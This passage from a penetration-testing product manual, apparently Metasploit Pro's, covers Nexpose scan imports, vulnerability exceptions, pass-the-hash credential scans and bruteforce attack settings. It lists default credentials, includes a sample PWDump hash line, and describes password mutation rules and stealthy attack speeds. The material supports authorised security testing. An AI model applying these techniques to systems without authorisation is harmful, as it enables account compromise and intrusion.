3. When the Import Data window appear, click Choose Fileto choose a file to import.
Import Nexpose Data
204
4. When the File Upload window appears, navigate and choose a file to import. 5. Click Open after you select the file. 6. In the Exclude Address field, enter the target addresses that you want to leave out of the import. 7. Select Do not change existing hosts if you want to retain the current host information. 8. Click the Import button.
Excluding Hosts from a Nexpose Data Import

If you do not want Metasploit Pro to import specific hosts from a Nexpose report, you can exclude those hosts from the import. To exclude hosts during an import, type the host addresses that you want to exclude in the Exclude Addresses field.
Running a Nexpose Scan

1. From within a project, click the Analysis tab. 2. Click Nexpose from the Quick Tasks menu. 3. Select a Nexpose Console. The list shows Nexpose consoles that you have added to the project. 4. Enter the addresses for the scan targets. You can specify an IP address or a host name. There can be one address on each line. Note: You can use standard IPv6 addressing to define individual IPv6 addresses. For example, use fe80::202:b3ff:fe1e:8329 for single addresses and 2001:db8::/32 for CIDR notations. For link local addresses, you must append the interface ID to the address. For example, enter fe80::1%eth0 for a link local address. 5. Select a scan template. 6. Click Show Advanced Options to configure additional options for the scan. 7. Launch the Nexpose scan.
Running a Nexpose Scan with a Custom Template

To use a custom scan template for a Nexpose scan, you must supply the scan template ID, not the scan template name. To identify the scan template ID, log into the Nexpose Security Console, select Administration > Scan Templates, and choose the scan template that you want to use.
Excluding Hosts from a Nexpose Data Import
205
When the Scan Template Configuration page displays, locate the URL address box at the top of the Nexpose Console. The URL address box displays the address and the template ID for the scan template. For example, in the following address, https://my.console.address:3780/admin/wizard/scantemplate.html?templateid=dos-audit, the template id is dos-audit. For more information on scan template IDs, visit the Nexpose documentation. 1. From within a project, click the Analysis tab. 2. Click Nexpose from the Quick Tasks menu. 3. Select a Nexpose Console. The list shows Nexpose consoles that you have added to the project. 4. Enter the addresses for the scan targets. You can specify an IP address or a host name. There can be one address on each line. 5. Click the Scan Template list. Choose Custom, which enables you to select a custom scan template. 6. Click Show Advanced Options. 7. From the Advanced Nexpose Scan Settings area, enter the scan ID for the that you want to use in the Custom scan template name field. Note: Scan template IDs cannot contain a hyphen. If the scan template ID contains a hyphen, replace the hyphen with an underscore. If the scan template ID changes, the Nexpose scan does not update the scan template ID. You must update the Nexpose scan to use the new scan template ID. 8. Launch the Nexpose scan.
Purging Scan Data

A purge removes all scan data from the Nexpose Console and ensures optimal performance from the Nexpose scanner. If you enable the purge scan option, Nexpose automatically deletes the scan data when the scan completes. 1. Open a project. 2. Click the Analysis tab. 3. Click Nexpose from the Quick Tasks menu. 4. Select a Nexpose Console. The list shows Nexpose consoles available for the project. 5. Enter addresses for the scan targets. 6. You can specify an IP address or a host name. There can be one address on each line.Metasploit Pro supports IPv4 and IPv6 addresses. You can use standard IPv6 addressing to define individual IPv6 addresses. For example, use
Purging Scan Data
206
fe80::202:b3ff:fe1e:8329 for single addresses and 2001:db8::/32 for CIDR notations. For link local addresses, you must append the interface ID to the address. For example, enter fe80::1%eth0 for a link local address. 7. Select a scan template. 8. Click Show Advanced Options to configure additional options for the scan. 9. Select the Purge Scan results upon completion option. 10. Launch the Nexpose scan.
Passing the Hash from Metasploit

Passing the hash is a technique that enables attackers to use the password hash to authenticate to a remote server or service. During exploitation, Metasploit Pro collects data, such as password hashes, from the exploited system. After Metasploit Pro collects password hashes from a target, it can pass the hash to Nexpose and run a Nexpose scan to perform a credential scan. Note: Before you can pass the hash in Metasploit Pro, you must configure a Nexpose Console from the Global Settings. After you configure a Nexpose Console, you can launch a Nexpose scan from the Metasploit Pro interface to pass the hash to the Nexpose scan. 1. From within a project, click the Analysis tab. 2. Click Nexpose from the Quick Tasks menu. 3. Select a Nexpose Console. The list shows Nexpose consoles that are available for the project. 4. Enter addresses for the scan targets. You can specify an IP address or a host name. There can be one address on each line.Metasploit Pro supports IPv4 and IPv6 addresses. You can use standard IPv6 addressing to define individual IPv6 addresses. For example, use fe80::202:b3ff:fe1e:8329 for single addresses and 2001:db8::/32 for CIDR notations. For link local addresses, you must append the interface ID to the address. For example, enter fe80::1%eth0 for a link local address. 5. Select a scan template. 6. Click Show Advanced Options to configure additional options for the scan. 7. Select Pass the LM/NTLM hash credentials. The Hash Credentials box displays. Metasploit Pro automatically populates the Hash Credentials box with a list of looted hashes. You can modify or add hashes to the hash list. 8. Launch the Nexpose scan.
Passing the Hash from Metasploit
207
Searching for Tagged Nexpose Assets

You can use any search field in the Metasploit Web UI to search for tagged assets. To search for a tag, prefix the tag with the hash (#) symbol. Metasploit Pro returns a list of all assets that use the tag. For example, if you search for #nexpose, Metasploit Pro returns any host that references that tag.
Importing Nexpose Data

You can import data fromNexpose if you have a site that you have already scanned and want to bring those assets into Metasploit Pro for further testing. You can either import a site from a Nexpose Console or you can import an scan data from aNexpose XML export.
To import a Nexpose XML export:

1. Open the project that you want to import data into. 2. From the Tasks bar, click the Import button. The Import Data page appears. 3. Click the Choose File button to find the file you want to import. The File Upload window appears. Note: Metasploit Pro supports the following Nexpose export types: XML Export, XML Export 2.0, and Nexpose Simple XML Export. 4. Find and choose the Nexpose export you want to import. 5. Click Open after you select the file. 6. If you want to specify an exclusion list, enter the target addresses that you do not want to import in the Exclude Addresses field. Note: You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry. 7. Select Do not change existing hosts if you do not want subsequent scans to modify the host information. 8. Select if you want Metasploit Pro to automatically tag hosts with their OS as the system imports them. 9. Enable any additional tags that you want to assign to the assets. 10. Import the data.
To import data from a Nexpose site:

1. Verify that you have a Nexpose Console configured globally.
Searching for Tagged Nexpose Assets
208
Note: For more information on configuring a Nexpose Console, see Configuring a Nexpose Console on page 200 1. Open the project that you want to import data into. 2. From the Tasks bar, click the Import button. The Import Data page appears. 3. Click the Choose File button to find the file you want to import. The File Upload window appears. Note: Metasploit Pro supports the following Nexpose export types: XML Export, XML Export 2.0, and Nexpose Simple XML Export. 4. Find and choose the Nexpose export you want to import. 5. Click Open after you select the file. 6. If you want to specify an exclusion list, enter the target addresses that you do not want to import in the Exclude Addresses field. Note: You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry. 7. Select Do not change existing hosts if you do not want subsequent scans to modify the host information. 8. Select if you want Metasploit Pro to automatically tag hosts with their OS as the system imports them. 9. Enable any additional tags that you want to assign to the assets. 10. Import the data.
Importing Nexpose Data
209
Vulnerability Exceptions
An exception defines a scenario where it is acceptable for a vulnerability to exist. When you define an exception for a vulnerability, you exclude it from a report and consider the vulnerability as an accepted risk. For example, you may want to define a exception for a vulnerability that poses minimal security risk, but requires more resources than you want to invest. In this particular case, it may be more cost effective to accept the vulnerability as a known risk than to remediate it. When you import Nexpose data or perform a Nexpose scan, Metasploit Pro pulls the exception data for the vulnerability and stores it in the project. After you test and verify the vulnerabilities, you may want to use the results of the penetration test to update the vulnerability exception for each asset. Use the Nexpose Exception Push feature in Metasploit Pro to create and approve vulnerability exceptions for an asset. After you define the exceptions, you can export, or push, the vulnerability exceptions from Metasploit Pro to Nexpose. The Nexpose Console displays the updated vulnerability exception information on the Asset Summary page. Note: You can only create an exception for a vulnerability that you import from Nexpose.
Reasons for Vulnerability Exceptions

A vulnerability exception can exist due to any of the following reasons:
l
False positive - You may want to exclude false positives reported by Nexpose. A false positive occurs when a vulnerability scanner detects a vulnerability when none exists. Compensating control - You may want to exclude vulnerabilities that have mitigated risks. For example, if a vulnerability exists on a device that has an firewall in place, an organization may determine that the firewall provides enough protection and relegate the vulnerability as a minimal threat. Acceptable use - You may want to create an exception for vulnerabilities that are part of organizational practices. Acceptable risk - You may want to exclude vulnerabilities that are low risk vulnerabilities. These vulnerabilities tend to pose minimal security risk and are likely to consume more resources than they are worth.
Creating a Vulnerability Exception

To create a vulnerability exception, your project must contain assets from a Nexpose scan or import. You must also have an active Nexpose Console configure for the project. Metasploit Pro connects to the Nexpose Console that you configured for the project to create vulnerability exceptions for an asset.
Vulnerability Exceptions
210
If the project does not contain an active Nexpose Console or assets, the Nexpose Exception Push feature is unavailable. When you import or scan assets from Nexpose, you should enable automatic tagging. A tag is a label that you apply to an asset in order to group them together based on a set of criteria. A tag helps you quickly identify and find assets to run tests against. 1. Select Project > [Project Name] > Vulnerabilities from the main menu.
2. When the list of assets and vulnerabilities appears, select the assets that you want to use to create vulnerability exceptions. 3. Click Nexpose Exceptions. 4. When the New Nexpose Exceptions Push window appears, choose the Nexpose Console that you want to use to push the vulnerability exceptions. 5. Choose if you want to automatically approve the vulnerability exception. If you do enable this option, you will need to approve the vulnerability request through the Nexpose Console. 6. Choose if you want to set an expiration date for the vulnerability exception. If you choose this option, Nexpose will remove the exception from the asset on the date that you specify. 7. The Vulnerability Exceptions area displays a table that lists the vulnerability information for each asset that you added to the exception push. Select the vulnerability that you want to create an exception for. 8. Choose a reason for the exception. 9. Add any additional comments about the exception, such as how the vulnerability meets the requirements for the exception. 10. Create the exceptions. After you create the exceptions, open the Nexpose Console and verify that the asset shows the vulnerability exception that you pushed from Metasploit Pro.
Creating a Vulnerability Exception
211
Nexpose Asset Groups

In Nexpose, an asset group represents the logical grouping of assets. Assets within an asset group may share some commonality, such as operating systems or services. You create asset groups so that you can easily assign a set of assets to a specific user. Any user who has access to the asset group can monitor and remediate the vulnerabilities that Nexpose identifies for the assets within the group. In Metasploit Pro, host tags behave similarly to asset groups. Host tags help you logically group hosts, or assets, based on a set of criteria. For example, you can use tags to group together machines that are exploitable or to identify machines that have weak passwords. Host tags are particularly useful if you want to use the results of a penetration test to create an asset group in Nexpose. In Metasploit Pro, you can search for assets based on their host tag and create an asset group for those assets.
Creating a Nexpose Asset Group

To create a Nexpose asset group, your project must contain assets from a Nexpose scan or import. You must also have an active Nexpose Console configured for the project. Metasploit Pro connects to the Nexpose Console that you configure for the project to create asset groups. If the project does not contain an active Nexpose Console or assets, the Nexpose Asset Group Push feature is unavailable. Additionally, to utilize the Nexpose Asset Group Push feature, you must apply tags to the assets. A tag logically groups together a set of assets based on a set of criteria. For example, you can tag assets as vulnerable. You can apply tags manually, or you can enable automatic tagging for Nexpose scans and imports. 1. From within a project, click the Tags tab. 2. Select the tags that you want to use to create asset groups. 3. Click Nexpose Push. 4. Choose the Nexpose Console that you want to use to create the asset groups. 5. Enter a descriptive name for the asset group. 6. Enter a description for the asset group. 7. Enter a list of IP addresses for the assets that you want to include in the asset group. 8. Create the asset group.
Nexpose Asset Groups
212
Automatically Tagging Assets from a Nexpose Scan

1. From within a project, click the Analysis tab. 2. Click Nexpose from the Quick Tasks menu. 3. When the Nexpose configuration page appears, select a Nexpose Console. The Nexpose Console dropdown shows the consoles that you have configured for Metasploit Pro to use. 4. Enter the addresses for target assets that you want to scan. You can specify an IP address or a host name. 5. Enter one entry per line. Select a scan template. 6. Click Show Advanced Options to configure additional options for the scan. 7. Select the Automatically tag by OS option if you want to tag assets with their OS type. For example, Metasploit Pro uses the os_windows tag for Windows systems and the os_linux tag for Linux systems. 8. From the Automatic Tagging area, you can choose or create the tags that you want to apply to the hosts. To create a tag, type the tag name in the empty tag field and select the tag. 9. Launch the Nexpose scan.
Automatically Tagging Assets from a Nexpose Import

1. From within a project, click the Analysis tab. 2. When the Host window appears, click Import. 3. When the Import Data window appears, click Browse to navigate to file that you want to import. 4. When the File Upload window appears, navigate and choose the Nexpose XML file to import. 5. Click Open after you select the file. 6. Enter the target addresses that you want to exclude. 7. Select Do not change existing hosts if you do not want the imported information to overwrite the data for an existing host. 8. Select the Automatically tag by OS option if you want to tag assets with their OS type. For example, Metasploit Pro uses the os_windows tag for Windows systems and the os_linux tag for Linux systems. 9. From the Automatic Tagging area, you can choose or create the tags that you want to apply to the hosts. To create a tag, type the tag name in the empty tag field and select the tag. 10. Import the data.
Automatically Tagging Assets from a Nexpose Scan
213
Vulnerability Tracking
The Metasploit Web UI provides an interactive interface that you can use to visualize and validate the vulnerability data from a Nexpose report. Metasploit Pro identifies the assets, imports vulnerability data, indexes the data, and attempts to map the each vulnerability to an exploit. Metasploit Pro displays most of the content for each asset on the Hosts page. The Hosts page provides you with a high-level view of the assets that Metasploit Pro imported. You can see the number of services, vulnerabilities, and exploit attempts for each host. If you want to explore a bit more, you can visit the Vulnerabilities tab to learn more about each asset.
Vulnerability Overview Page

The Vulnerability Overview page displays all the vulnerabilities that you import from Nexpose. The Vulnerability Overview page provides you with a broad scope of all the vulnerabilities that have been identified on your assets. View the Vulnerability Overview page to quickly identify the assets that Metasploit Pro has tested and exploited; assets that have not been tested; or assets that are not exploitable.
Viewing the Vulnerability Overview Page

To view the Vulnerabilities Overview page, select Project > [Project Name] > Vulnerabilities from the main menu. A list of vulnerabilities that have been identified within the project displays in the browser.
Vulnerability Details Page

The Vulnerability Details page provides you with the granular details of a vulnerability. When you import vulnerability scan data from Nexpose, Metasploit Pro pulls the vulnerability details from the report, such as the Nexpose console ID, vulnerability name, description, test results, solution, and references. Metasploit Pro displays the vulnerability data for each asset on the Vulnerability Details page. You can leverage the information on the Vulnerability Details page to launch an exploit against the vulnerability. Metasploit Pro automatically maps the vulnerability to a matching exploit based on service and vulnerability information. You can view the matching exploits from the Available Modules tab on the Vulnerability Details page. Note: Metasploit Pro maps vulnerabilities to exploit modules. Other modules, like auxiliary, payload, and post-exploitation modules, are not mapped to vulnerabilities.
Vulnerability Tracking
214
Viewing the Vulnerability Details Page

To view the details page for a particular vulnerability, select Project > [Project Name] > Vulnerabilities from the main menu. A list of assets and vulnerabilities appears. Click on the vulnerability name. The details for the vulnerability display in the browser window.
Host Details Page

The Host Details page provides you with a detailed look at a particular host or asset. You can view the on the Host Details page to view the data collected from a particular host, such as the active services, identified vulnerabilities, credentials, and notes. Use this data to perform further reconnaissance against a target so that you can pinpoint the best method to exploit a system.
Viewing the Host Details Page

To view the details page for a particular host, select Project > [Project Name] > Hosts from the main menu. A list of assets appears. Click on a host name or IP address to view more information about the host. The details for the host display in the browser window.
Attempts Tab
If Metasploit Pro has run any module against the host, you can view the results from the Attempts tab. The Attempts tab shows when the modules were run, the person who launched the module, the result code for the module run, and the reason the module failed or succeeded. For example, you may want to view the Attempts tab if you want to find a list of modules that Metasploit Pro has run against a particular port or service.
Result Codes
A result code provides the reason why a module did not run successfully. The following result codes are available:
l
None - Indicates that Metasploit Pro could not determine if the module ran successfully or failed. Unknown - Indicates that Metasploit Pro could not determine if the module ran successfully or failed. Unreachable - Indicates that Metasploit Pro could not reach the network service. Bad-config - Indicates that the exploit settings were not configured correctly. Disconnected - Indicates that the network service disconnected during a module run. Not-found - Indicates that Metasploit Pro could not find the application or service. Unexpected-reply - Indicates that Metasploit Pro did not receive the expected response from the application.
Host Details Page
215
Timeout-expired - Indicates that a timeout occurred. User-interrupt - Indicates that the user stopped the module run. No-access - Indicates that Metasploit Pro could not access the application. No-target - Indicates that the module configuration was not compatible with the target. Not-vulnerable - Indicates that the application was not vulnerable. Payload-failed - Indicates that Metasploit Pro delivered a payload, but was unable to open a session.
Modules Tab
Metasploit Pro automatically maps modules to a host based on the open services and vulnerability information that is available. Due to the number of vulnerability checks that are available, Metasploit matches exploits based on services rather than vulnerabilities. The Modules tab displays a full list of exploits and auxiliary modules that Metasploit Pro can run against a particular asset.
Source Tab
The Source tab identifies the device used to import the host. For example, if you imported assets from a Nexpose report, the Source tab shows the Nexpose console ID and device ID.
Host Details Page
216
Chapter 9:
Password Cracking
To learn more about password cracking, read the following topics:

l
About Password Cracking on page 218 Bruteforce Attacks on page 218 Word Lists on page 232 Credential Management on page 229
About Password Cracking

After you discover live hosts on the target network, you can execute bruteforce attacks or exploit modules to gain access to the target systems. To gain access to a target, you must identify the security vulnerability that exists on the target and successfully execute the exploit code to establish a connection to the target.
Password Cracking Methods

l
Bruteforce Attacks - A bruteforce attack attempts a large number of common user name and password combinations to gain access to hosts. Metasploit Pro provides you with several preset bruteforce profiles that you can use to customize the bruteforce attack for the target environment. When Metasploit Pro successfully identifies a credential in a session capable module, such as SMB, SSH, Telnet, or MSSQL, the system automatically opens the session.
John the Ripper - John the Ripper, or JtR, is a tool that you can use to crack password hashes in order to recover weak passwords. To run JtR, you need to perform a module search for John the Ripper. There are JtR modules available for Linux, Windows, Oracle, and MySQL with varying bruteforce modes. Choose the module that works best for your target systems.
Bruteforce Attacks
A bruteforce attack tries a large number of common user name and password combinations in order to open a session on the target machine. After the bruteforce attack successfully guesses a credential, the system stores the user name and password in the workspace. In Metasploit Pro, a bruteforce attack launches service specific modules to attempt to crack the credentials for the service. You can choose the services and ports that you want to target, and the bruteforce attack chooses modules that target those services. If the bruteforce attack successfully cracks a credential and opens a session, you can use the session to gain further access and information for the system. To run a bruteforce attack, you must define the services that you want to target on a particular host or network range. In addition to the services, you can configure the bruteforce attack to exclude specific hosts and credentials, perform a dry run, and use a particular payload type.
Bruteforce Message Indicators

Metasploit Pro color codes bruteforce task logs to help you identify successful and unsuccessful attacks. Metasploit Pro records successful attacks in the database as authentication notes. You can view the authentication notes from the Analysis window.
About Password Cracking
218
The following list describes the color codes that Metasploit Pro uses for bruteforce tasks:
l
Green Message - Good status indicator Yellow Message - Credential found indicator Red Message - Bad status indicator
Bruteforce Attack Options

The following options are available for you to configure for a bruteforce attack.
Bruteforce Depth: Quick

Identifies the basic password combinations. The Quick depth has the shortest duration because it attempts less than 25 known user name and password combinations. The Quick depth uses a static list of credentials and tries them against discovered services. The list of credentials include: Admin:admin Admin:admin1 Admin:admin! Test:test Test:test1234 Test123:test123 cisco:cisco user:user administrator:administrator root:root root:toor After the bruteforce attack tries the static credentials list, it tries the user names with a blank password. The bruteforce attack prepends known credentials to the static list. Metasploit Pro generates approximately 20 credentials in order to bruteforce all services.
Bruteforce Depth: Defaults Only

Attempts a small number of known default and user names and passwords.
Bruteforce Attacks
219
The default only mode generates the following credentials: 16 credentials for PostgreSQL 29 credentials for DB2 141 credentials for SSH 141 credentials for Telnet 22 credentials for MSSQL 150 credentials for HTTP 4 credentials for HTTPS 13 credentials for SMB 21 credentials for FTP
Bruteforce Depth: Normal

Attempts a fixed maximum number of credentials. The normal mode takes approximately 5 minutes per host on a fast LAN. The normal mode focuses on common, protocol-specific user names as well as discovered user names and passwords. The normal mode identifies discovered passwords from a list of common passwords. Most protocols have common defaults, which Metasploit Pro tries after known good credentials on other services. The normal mode generates the following credentials:
l
4,000 credentials for PostgreSQL 3,000 credentials for DB2 10,000 credentials for MySQL 1,000 credentials for SSH 1,000 credentials for Telnet 10,000 credentials for MSSQL 6,000 credentials for HTTP 1,000 credentials for HTTPS 4,000 credentials for SMB 1,000 credentials for FTP
Bruteforce Attacks
220
The system tries these generated credentials after the current known good credentials. The system adjusts the credentials figures after each successive run, if the credentials become known as the modules run.
Bruteforce Depth: Deep

Attempts three times more passwords than the normal mode. The deep mode takes 15-20 minutes for each host on a fast LAN, if all services are enabled. The additional passwords come from the common password list. For the few protocols that support fast enough guesses, passwords are subject to a fixed set of transformations. For example, 1 for I and 0 for O. The deep mode generates the following credentials:
l
12,000 credentials for PostgreSQL:5432 9,000 credentials for DB2:50000 30,000 credentials for MYSQL:3306 132 credentials for SSH:22 132 credentials for Telnet:23 30,000 credentials for MSSQL:13013 18,000 credentials for HTTP:8080 (tomcat) 3,000 credentials for SMB:445 (Microsoft)
SSH and Telnet are not subject to the deep multiplier because these credentials take longer to test than the other services.
Bruteforce Depth: 50K

Attempts 50,000 user name and password combinations for each service.
Bruteforce Depth: Imported Only

Uses the user name and password list, or credential file, that you import into the system.
Bruteforce Depth: Known Only

Attempts credentials that are already known for all services in the target workspace. This includes SSH keys and passwords.
Bruteforce Speed: Turbo

Uses the Turbo speed on a fast LAN.
Bruteforce Attacks
221
Bruteforce Speed: Fast

Uses the Fast speed on most LANs.
Bruteforce Speed: Normal

Uses the Normal speed for external use.
Bruteforce Speed: Slow

Uses the Slow speed for slow WAN links or to hide the scan.
Bruteforce Speed: Stealthy

Uses the Stealthy speed if you want the attack to be sneaky.
Bruteforce Speed: Glacial

Requires the most amount of time to complete.
Target Services
Bruteforce targets the following services: SMB, PostgreSQL, DB2, MySQL, MSSQL, Oracle, HTTP, HTTPS, SSH, SSH_PUBKEY, Telnet, FTP, POP3, EXEC, LOGIN, SHELL, VNC, SNMP, and AFP.
Target Addresses
Defines the hosts explicitly included in the bruteforce attack.
Excluded Addresses
Defines the hosts explicitly excluded from the bruteforce attack.
Dry run
Runs a bruteforce attack, prints a transcript of the modules, and quits the attack. Metasploit Pro does not run a live bruteforce attack against the target system.
Produce verbose in the output task log

Records the successes and failures of the modules that the bruteforce attack runs.
Additional credentials
Defines the user name and password combinations that the bruteforce attack uses. Use commas to separate user name and password combinations. Use one of the following methods to specify additional credentials for the bruteforce attack:
Bruteforce Attacks
222
For domain-specific user name and password combinations, use the following format: domain/username.password. For user names with no password, define the user name only. For user names with multiple passwords, use the following format: username password1, password2, password 3.
SMB Domains
Adds the domain as a space delimited list for services that accept Windows-based authentication.
Payload Type
Specifies the type of payload that the bruteforce attack uses. You can choose Meterpreter or command shell.
Listener Ports
Defines the port or port range that the bruteforce attack uses in reverse connect payloads.
Connection Type
Defines the connection type that the payload uses. Choose from auto, reverse, or bind.
Auto Launch Macro

Defines the macro that runs during the bruteforce attack. You can create macros from the Global Settings.
Automatically open sessions with guessed credentials

Opens the session when a credentials is successful.
Limit to one cracked credential per service

Stops the bruteforce attack after the system collects the first credential.
Max guesses per user

Limits the number of guesses for each user - not each user name.
Timeout per service

Limits the total time that the attack limits to each service instance.
Timeout overall
Limits the total amount of time that the system allocates to the bruteforce attack.
Max guesses overall

Limits the total number of guesses that the bruteforce attack attempts.
Bruteforce Attacks
223
Skip blank password generation

Disables the use of blank passwords.
Exclude machine names as passwords

The bruteforce attack does not use known computer names and user names as passwords.
Skip common Windows machine accounts

Skips Windows accounts that do not have remote login rights or randomly generated passwords. The accounts include TsInternetUser krbtgt NetShowServices, IUSR_<anything>, IWAM_<anything>, WMUS_USER-<anything>.
Skip common UNIX machine accounts

Skips Unix accounts that dont have remote login rights or randomly generated passwords. This includes: daemon, bin, sys, sync, games, man, lp, mail, news, uucp, proxy, www-data backup list, irc, gnats, nobody, libuuid, syslog, messagebus, haldaemon, hplip, avahi, couchdb, kernoops, saned, pulse, gdm, sshd, telnetd, dhcp, avahi-autoipd, speech-dispatcher.
SMB: Recombine known, imported, and additional credentials

Takes all the usernames:passwords from the known credentials list, imported list, and credentials textbox, and assigns all the passwords to all users.
SMB: Preserve original domain names

Tries the original domain name.
Mutate known credentials

Determines the portion of the credential list subjected to mutations in this case, all known credentials.
Mutate imported credentials

Determines the portion of the credential list subjected to mutations in this case, all imported credentials.
Mutate additional credentials

Determines the portion of the credential list subjected to mutations in this case, all credentials manually added by the user.
Mutation: append numbers to candidate passwords

Strips off all trailing digits off a password and replaces it with a single digit and skips all passwords that do not contain a letter.
Bruteforce Attacks
224
Mutation: prepend numbers to candidate passwords

Strips off all digits at the beginning of a password and replaces it with a single digit and skips all passwords that do not contain a letter.
Mutation: substitute numbers within candidate password

Strips off up to two digits within a password and replaces it with up to two digits. Passwords with more than three digits are ignored.
Mutation: transpose letters for l33t-sp34k alternatives in candidate passwords

Rotates through a number of alpha to numeric substitutions before substituting all of them.
Mutation: append special characters to candidate passwords

Appends a punctuation mark to the beginning of a password or replaces an existing punctuation mark.
Mutation: prepend special characters to candidate passwords

Prepends a punctuation mark to the end of a password or replaces an existing punctuation mark.
Recombine known, imported, and additional credentials

Takes the user names and passwords from the known credentials list, imported list, and credentials text box, and assigns all the passwords to all users.
Include known credentials

Uses all known credentials from the project. The bruteforce attack tries the known passwords first. All credentials that are known only and quick are not affected by the credential generation switch.
Target Services
After Metasploit Pro opens the session, you can select the services that you want to target in the bruteforce attack. You can target the following services:
l
AFB DB2 EXEC FTP HTTP HTTPS Login
Bruteforce Attacks
225
MySQL MSSQL Oracle POP3 Postgres Shell SMB SNMP SSH SSH_PUBKEY Telnet VMAUTHD VNC WinRM
Running a Bruteforce Attack

Before you run a bruteforce attack, you must run a scan or data import first. 1. Open a project. 2. Click the Analysis tab. 3. Select the hosts that you want to run the bruteforce attack against. 4. Click Bruteforce. The Bruteforce window appears. Metasploit Pro automatically populates the target addresses field with the selected hosts. 5. Select the depth of the bruteforce attack. 6. Select the services that you want the bruteforce attack to target. 7. Click Show Advanced Options to configure additional options for the bruteforce attack. 8. Launch the bruteforce attack.
Running a Bruteforce Attack against a VM

You can run a bruteforce attack against vmauthd, the authentication daemon for VMwares virtual infrastructure client, and for VMware Web Service. If the bruteforce attack successfully guesses the
Running a Bruteforce Attack
226
credentials, then you can use the credentials to administer VMware. You cannot access VMware directly from Metasploit Pro. However, after you gain access to a virtual machine, you can run post-exploitation modules to identify more information about the machine, such as configuration settings, logins, and other virtual machines. 1. Open a project. 2. Click the Analysis tab. 3. Select the virtual target that you want to bruteforce. 4. Click Bruteforce. The Bruteforce window appears. 5. Metasploit Pro automatically populates the target address field with the vmauthd target address. 6. Launch the bruteforce attack.
Running a Bruteforce Attack with a Password List

Before you can run a bruteforce attack using an imported credential list, you must import the user name and password list. To import credentials, click the Manage Credentials button and select the file that you want to upload. 1. Open a project. 2. Click the Analysis tab. The Hosts page appears. 3. Select the hosts that you want to run the bruteforce attack against. 4. Click Bruteforce. The Bruteforce window appears. 5. Metasploit Pro automatically populates the target addresses field with the selected hosts. 6. Select Imported Only for depth of the bruteforce attack. 7. Select the services that you want the bruteforce attack to target. 8. Launch the bruteforce attack.
Running a Bruteforce Attack with a Single Credential

1. Open a project. 2. Click the Analysis tab. 3. Select the hosts that you want to test the credential against. 4. Click Bruteforce. The Bruteforce window appears. Metasploit Pro automatically populates the target addresses field with the hosts that you chose.
Running a Bruteforce Attack with a Password List
227
5. Select Quick for depth of the bruteforce attack. 6. Select the services that you want the bruteforce attack to target. 7. Click Show Advanced Options to configure additional options for the bruteforce attack. 8. Enter the credential that you want to use for the bruteforce attack in the Additional Credentials field. For example, enter admin admin. 9. Launch the bruteforce attack.
Importing a Password List

All credential files, or custom word lists, must use a newline delimited format. 1. Open a project. 2. Click the Analysis tab. The Host window appears. 3. Select the hosts you that you want to include in the bruteforce attack. 4. Click Bruteforce. 5. Click Manage Credentials. The Credential Import page appears. 6. Click Browse to navigate to the location of the credentials file. The credentials file must be in plain ASCII. 7. Click Open after you select the credentials file. 8. Select the type of content that the list contains. The file type can be UserPass, Usernames, Passwords, PWDump, or SSH key. For example, choose Usernames if the list contains only user names or Passwords if the list contains only passwords. 9. Enter a name for the imported file. 10. Enter a description for the imported file. 11. Upload the file.
Importing a Password List
228
Credential Management
You can import sets of untested credentials into Metasploit Pro. Use imported credentials when you run the scan in normal, deep, or imported only mode. If you import multiple files, Metasploit Pro consolidates the credentials from each file and stores the data within a single, running file. The imported credentials do not display under the credentials area. To view the imported credentials, you can download the imported credentials as a single text file. Note: You should use the Additional Credentials option for known credentials or for bruteforce attacks that use the Include known credentials option.
Supported Credential Formats

For imported credential files, you can add spaces and any other special characters to passwords by specifying them as \x20 or any other hex value -- \x09 for tab, \x90 for a password with a NOP. If you have a password that contains the string \x20, you can use \x5cx20 to protect the password. Metasploit Pro supports the following credential file formats:
PWDump
A PWDump file can contain SMB hashes and space delimited user name and password pairs. Each item must be on a separate line. The bruteforce attack attempts the SMB hash credentials against services that accept SMB hashes as plain text. When you use a PWDump file, you must define the SMB domains to target services that accept Windows authentication. When you use a PWDump file, use the imported only bruteforce depth to test only this list of credentials. Use this format if you have an exported a Metasploit PWDump.
Example:
administrator:501:de8130a284642c74523fa0f66c35ef02:421a1c7abc7b160c20ed78a2e06e09c8:::
User names and passwords

A user name and password file is a text file that contains a user name and password on each line. You must use a space to separate the user name and password.
Credential Management
229
User names and passwords can contain non-ASCII in \xXX notation. For example, you can denote spaces within a user name or password as \x20. When you use a user name and password file, use the imported only bruteforce depth to test only this list of credentials. Use this format if you have a list of user names and passwords. Example: username1 passwordA username2 passwordA passwordB username3 passwordA passwordB passwordC
Passwords only
A passwords only file is a text file that contains only passwords. There can be only one password for each line in the file. Metasploit Pro assigns the passwords to known user names. Passwords can contain non-ASCII in \xXX notation. For example, you can enter testuser d\xeadb\xeef. When you use a plain password file, do not use the imported only bruteforce depth. You must choose a different bruteforce depth so that Metasploit Pro can assign a user names to each password. Use the plain password format if you have a list of passwords and you want Metasploit Pro to specify user names to test against.
Example:
password1 password2 password3
User names only

A user names only file is a text file that contains only user names. There can be one user name for each line in the file. Metasploit Pro assigns the user names to common passwords. User names can contain non-ASCII in \xXX notation. For example, you can enter testuser d\xeadb\xeef.
230
When you use a user names only file, do not use the imported only bruteforce depth. You must choose a different bruteforce depth so that Metasploit Pro can assign a password to each user name.
Example:
jack joe john
231
Word Lists
A word list is an exhaustive list of common passwords and terms that a bruteforce attack or password cracker can use to attempt to guess the login credentials for a particular account. By default, Metasploit Pro provides several different word lists, but you can add your own custom word lists for the bruteforce attack to use.
Importing a Custom Word List

All credential files, or custom word lists, must use a newline delimited format. 1. Open a project. 2. Click the Analysis tab. The Host window appears. 3. Select the hosts you that you want to include in the bruteforce attack. 4. Click Bruteforce. 5. Click Manage Credentials. The Credential Import page appears. 6. Click Browse to navigate to the location of the credentials file. The credentials file must be in plain ASCII. 7. Click Open after you select the credentials file. 8. Select the type of content that the list contains. The file type can be UserPass, Usernames, Passwords, PWDump, or SSH key. For example, choose Usernames if the list contains only user names or Passwords if the list contains only passwords. 9. Enter a name for the imported file. 10. Enter a description for the imported file. 11. Upload the file.
Selecting a Custom Word List

After you import a credential file or custom word list, you can select the file that you want the bruteforce attack to use. 1. Open a project. 2. Click the Analysis tab. The Host window appears. 3. Select the hosts you that you want to include in the bruteforce attack. 4. Click Bruteforce. 5. Choose the depth and services for the brute force attack.
Word Lists
232
